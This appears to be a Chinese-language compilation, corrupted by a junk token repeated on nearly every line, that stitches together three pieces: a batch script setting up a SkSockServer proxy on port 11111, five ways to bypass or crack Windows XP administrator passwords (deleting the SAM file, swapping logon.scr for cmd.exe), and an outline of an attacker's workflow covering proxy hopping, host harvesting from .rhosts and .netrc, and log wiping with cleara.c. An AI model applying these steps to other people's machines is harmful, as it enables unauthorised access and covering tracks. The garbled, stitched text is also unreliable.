cd \ z?PF9QL1  
z?PF9QL1  
md test z?PF9QL1  
z?PF9QL1  
cd /d %windir%\system32\ z?PF9QL1  
z?PF9QL1  
net stop sksockserver z?PF9QL1  
z?PF9QL1  
snake.exe -config port 11111 z?PF9QL1  
z?PF9QL1  
net start sksockserver z?PF9QL1  
z?PF9QL1  
exit z?PF9QL1  
z?PF9QL1  

恢复管理员密码的五大秘诀 z?PF9QL1  
z?PF9QL1  
z?PF9QL1  
秘诀1：大家知道，WindowsXP的密码存放在系统所在的Winnt\System32\Config下SAM文件中，SAM文件即账号密码数据库文件。当我们登录系统的时 候，系统会自动地和Config中的SAM自动校对，如发现此次密码和用户名全与SAM文件中的加密数据符合时，你就会顺利登录;如果错误则无法登录。既然如此，我们的第一个方法就产生了：删除SAM文件来恢复密码。   z?PF9QL1  
z?PF9QL1  
　　如果你不用管本来系统卡包含的任意账号，而且有两个操作系统的话，可以使用另外一个能访问NTFS的操作系统启动电脑，或者虽然没有安装两个系统，但可以使用其他工具来访问NTFS。然后删除C：\WINNT\system32\config目录下的SAM文件，重新启动。这时，管理员Administrator账号就没有密码了。当然，取下硬盘换到其他机器上来删除SAM文件也算个好办法。   z?PF9QL1  
z?PF9QL1  
　　小提示：WindowsNT/2000/XP中对用户账户的安全管理使用了安全账号管理器(Security AccountManager,SAM)的机制，安全账号管理器对账号的管理是通过安全标识进行的，安全标识在账号创建时就同时创建，一旦账号被删除，安全标识也同时被删除。安全标识是惟一的，即使是相同的用户名，在每次创建时获得的安全标识都是完全不同的。因此，一旦某个账号被删除，它的安全标识就不再存在了，即使用相同的用户名重建账号，也会被赋予不同的安全标识，不会保留原未的权限 。   z?PF9QL1  
z?PF9QL1  
　　安全账号管理器的具体表现就是%SystemRoot%\system32\config\sam文件。SAM文件是WindowsNT/2000/XP的用户账户数据库，所有用户的登录名及口令等相关信息部会保存在这个文件中。   z?PF9QL1  
z?PF9QL1  
　　秘诀2：使用Off1ine NT Password & Registry Editor。用该软件可以制作Linux启动盘，这个启动盘可以访问NTFS文件系统，因此可以很好地支持Windows2000/XP。使用该软盘中的一个运行在Linux的工具Ntpasswd就可以解决问题。并且可以读取注册表并重写账号密码。使用的方法很简单，只需根据其启动后的提示一步一步做就可以了。在此，建议你使用快速模式，这样会列出用户供你选择修改哪个用户的密码。默认选择Admin组的用户，自动找到把Administrator的名字换掉的用户，十分方便。   z?PF9QL1  
z?PF9QL1  
　　秘诀3：使用Windows Key 5.0。该软件包含在PasswareKit5.0中，用于恢复系统管理员的密码，运行后生成3个文件：txtsetup.oem.winkey.sys和winkey.inf,3个文件一共才50KB,短小精悍。把这3个文件放到任何软盘中，然后使用XP安装光盘启动电脑，启动过程中按F6键让系统安装第三方的驱动程序。此时，正是我们切入的最好时机，放人该软盘就会自动跳到WindowsKey的界面。它会强行把Administrator的密码换成 "12345"，如此一来何愁大事不成?呵呵!当你重新启动以后，你会被要求再次修改你的密码。   z?PF9QL1  
z?PF9QL1  
　　秘诀4：使用NTFS DOS这个可以从DOS下写NTFS分区的工具。用该软件制作一个DOS启动盘，然后到C;\Winnt\System32下将屏幕保护程序logon.scr改名，接着拷贝command.com到C：\Winnt\system32下(2000可以用cmd.exe),并将该文件改名为logon.scr。这样启动机器后等待5分钟，本应该出现的屏幕保护现在变成了命令行模式，而且是具有Administrator权限的，通过它就可以修改密码或者添加新的管理员账号了。改完后不要忘了把屏幕保护程序的名字改回去啊。下载地址：http：/www.cgsecurity.org/index.html?   z?PF9QL1  
z?PF9QL1  
　　秘诀5：下面介绍一个比较与众不同的方法。你可以在别的分区上再装一个XP，硬盘分区格式要和原来的一样，并且请你注意一定不要和原来的XP安装在同一分区!在开始之前，一定要事先备份引导区MBR(Master Boot Record).备份MBR的方法有很多，可以自己编程，或使用工具软件，如杀毒软件KV3000等。装完后用Administrator登录，现在你对原来的XP就有绝对的写权限了。你可以把原来的SAM拷下来，用lOphtcrack得到原来的密码。也可以把新安装的XP的Winnt\System32\Config\下的所有文件覆盖到C\Winnt\System32\Config目录中(假设原来的XP安装在这里)，然后用KV3000恢复以前备份的主引导区MBR，现在你就可以用Administrator身份登陆以前的XP了。   z?PF9QL1  
z?PF9QL1  
　　小提示：MBR俗称"主引导区"，它的作用是读取磁盘分区表(Partition Table)里面所设定的活动分区 (Active Partition)，位于硬盘的柱面0、磁头0、扇区1的位置，也即俗你的0磁道位置。它是由分区命令fdisk产生的。MBR包括硬盘引导程序和分区表这两部分。MBR结束标志为55AA，用杀毒软件KV3000的F6功能即可查看，其默认画面即为MBR。如果MBR找不到活动分区，就会在屏幕上显示像Missing operating System等错误讯息，所以，如果你的WindowsXP无法正常开启。而你又在屏幕上看到类似这样的错误讯息，原因大多就是出在这里了。   z?PF9QL1  
z?PF9QL1  

黑客攻击的一般流程 z?PF9QL1  
z?PF9QL1  
z?PF9QL1  
    一般完整的攻击过程都是先隐藏自身，在隐藏好自己后再进行预攻击探测，检测目标机器的各种属性和具备的被攻击条件，然后采取相应的攻击方法进行破坏，达到自己的目的，之后攻击者会删除自己的行为日志。 z?PF9QL1  
1 隐藏自己 z?PF9QL1  
常见的攻击者隐藏自身的方式有以下几种： z?PF9QL1  
•    从已经取得控制权的主机上通过telnet或rsh跳跃。 z?PF9QL1  
•    从windows主机上通过wingates等服务进行跳跃。 z?PF9QL1  
•    利用配置不当的代理服务器进行跳跃。 z?PF9QL1  
•    利用电话交换技术先通过拨号找寻并连入某台主机，然后通过这台主机再连入internet来跳跃。 z?PF9QL1  
2 预攻击探测 z?PF9QL1  
    这步的主要任务是收集有关要攻击目标的有用的的信息。这些信息包括目标计算机的硬件信息、目标计算机的用户信息、存在的漏洞等。 z?PF9QL1  
    通常是从已经攻入的系统中的.rhosts和.netrc文件中将所列的机器挑选出来，从系统的/etc/hosts文件中可以得到一个很全的主机列表。但大多数情况下，选定一个攻击目标是一个比较盲目的过程，除非攻击者有很明确的目的和动机。攻击者也可能找到dns表，通过dns可以知道机器名、ip地址、机器类型、甚至还可以知道机器的主人和单位。 z?PF9QL1  
3 采取攻击行为   z?PF9QL1  
    在攻击探测中如果攻击者发现目标机器系统有可以被利用的漏洞或弱点，则立即采取攻击行为。在此过程中具体采用的攻击行为要视目标机器系统而定，目前较流行的手段有暴力破解、缓冲区益出、跨站脚本、拒绝服务、欺骗等。 z?PF9QL1  
4 清除痕迹 z?PF9QL1  
    攻击者清除攻击痕迹的方法主要是清除系统和服务日志。有些工具可以清除日志，如THC提供的cleara.c。cleara.c可以清除utmp/utmpx，wtmp/wtmpx，修复lastlog让其仍然显示该用户的上次登陆信息。有时攻击者会自己对日志文件进行修改，不同的unix版本的日志存储位置不同。 z?PF9QL1  
z?PF9QL1  
z?PF9QL1